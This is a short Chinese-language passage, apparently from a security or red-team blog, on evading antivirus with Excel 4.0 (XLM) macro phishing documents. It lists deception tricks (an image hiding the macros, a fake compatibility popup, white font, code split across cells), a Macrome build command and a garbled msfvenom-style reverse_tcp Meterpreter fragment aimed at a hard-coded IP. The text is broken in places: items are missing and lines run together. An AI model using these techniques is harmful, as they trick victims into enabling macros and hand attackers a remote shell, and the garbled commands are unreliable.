因为XLM的构造特点,如Auto_Open、数量贼多的char函数等等,某些AV还不管三七二十一的给你误报,所以bypass还是比较困难的。现在这个钓鱼方法已经工具化了,往往都集成了各种编码,加密。这里只介绍几种从攻击团伙的样本中学到的一些姿势。
1、图片遮盖将宏代码隐藏在图片下,图片可以是提示启用宏的引导性内容
2、交互式消息弹窗=IF(ALERT("此文档与您的服务程序不兼容,是否还要继续查看此文档?",1),,CLOSE(TRUE))dows/meterpreter/reverse_tcp lport=192.168.8.109 lport=4444 -b 'x00' --arch x86 --platform windows
代码是顺序执行的,所以该执行的也不受影响,通过交互式弹窗的方式让鱼儿放松警将代码拆分保存在各个分散的单元格中
5、更改字体颜色
修改字体颜色为白色
6、修改二进制文件使用工具执行,该命令会使用默认模板写入并混淆。
``Macrome.exe build --decoy-document decoy_document.xls payload payload32.bin --payload64-bit payload64.bin`
当受害者点击启用宏就会上线。上线后如果关闭excel,那么shell就会断开。
